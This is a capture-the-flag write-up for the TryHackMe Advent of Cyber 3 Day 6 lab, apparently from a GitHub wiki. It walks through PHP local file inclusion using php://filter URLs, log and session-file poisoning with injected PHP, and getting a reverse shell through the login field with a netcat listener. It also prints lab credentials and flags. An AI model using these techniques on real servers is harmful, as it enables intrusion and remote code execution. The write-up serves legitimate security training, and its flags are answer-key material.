Writeup: Advent of Cyber 3 Day 6 - AtomicMaya/knowledge-base GitHub Wiki
Advent of Cyber - Day 6
Link: Advent Of Cyber 3 on TryHackMe
Question 1
Deploy the attached VM and look around. What is the entry point for our web application?
Scan the endpoint with nmap -sV -sC -vv $ip
Answer: err
Question 2
Use the entry point to perform LFI to read the /etc/flag
file. What is the flag?
Answer: THM{d29e08941cf7fe41df55f1a7da6c4c06}
Question 3
Use the PHP filter technique to read the source code of the index.php
. What is the $flag variable's value?
If we try the standard LFI bypass without a filter for index.php
(url below), we encounter an error.
http://$ip/index.php?err=php://filter/resource=index.php
The reason for this is that it's rendering the PHP instead of just displaying the text, and this is where the filter bypass using Base64 comes into play, using the following url: http://$ip/index.php?err=php://filter/convert.base64-encode/resource=index.php
If we throw this into CyberChef, we get the following output, including our flag.
Answer: THM{791d43d46018a0d89361dbf60d5d9eb8}
Question 4
McSkidy forgot his login credential. Can you help him to login in order to recover one of the server's passwords?
Now that you read the index.php, there is a login credential PHP file's path. Use the PHP filter technique to read its content. What are the username and password?
From the previous question's index.php
file, we can see that there is another file at ./includes/creds.php
.
If we apply the same method as earlier, we can access it's contents at http://$ip/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php
.
If we throw that in CyberChef, we get the following:
Answer: McSkidy:A0C315Aw3s0m
Question 5
Use the credentials to login into the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server?
If we go to the original URL, http://$ip/index.php?err=error.txt
we can click the login
link at the bottom.
We then go to "Password Recovery", and we can see our password/flag:
THM{552f313b52e3c3dbf5257d8c6db7f6f1}
Question 6
The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log
.
curl -A "<?php phpinfo();?>" http://$ip.p.thmlabs.com/login.php
http://$ip/index.php?err=php://filter/resource=includes/logs/app_access.log
Answer: lfi-aoc-awesome-59aedca683fff9261263bb084880c965
Question 7
Bonus: The current PHP configuration stores the PHP session files in /tmp. Use the LFI to call the PHP session file to get your PHP code executed.
First, we need to discover our session ID, either by finding it among the phpinfo
results from the previous question (search for SESSION
) or by going to the Web Developer tools and checking storage.
We need two pages open:
http://$ip/login.php
http://$ip/index.php?err=php://filter/resource=/tmp/sess_$sessid
In the first, add <?php phpinfo(); ?>
to the login username, then press enter.
Then go to the second page and refresh.
Now. This is fun and all, but maybe we could go further? Maybe we could penetrate the box?
Let us look for a PHP reverse shell program!
We can use this one from pentestmonkey!
Let's just paste it (with the correct IP) into the first page and start a netcat listener (nc -lvnp 1234
)!
And refresh the second page...
And look at our listener!
Well? Why isn't it working?
Well, it has to do with the login field! It's putting everything on the same line! And the default php-reverse-shell.php
is full of comments, so if it's plonking everything on the same line, then everything after the first comment will end up commented!
So if we take the time to strip all the comments from the file, we can then copy that into the login form:
The second page will then timeout (as expected when spawning a shell):
And our listener will get some input!
(This falls under the umbrella of RCE, but there are no flags on the machine, so you can just log off afterwards)
Answer: No answer needed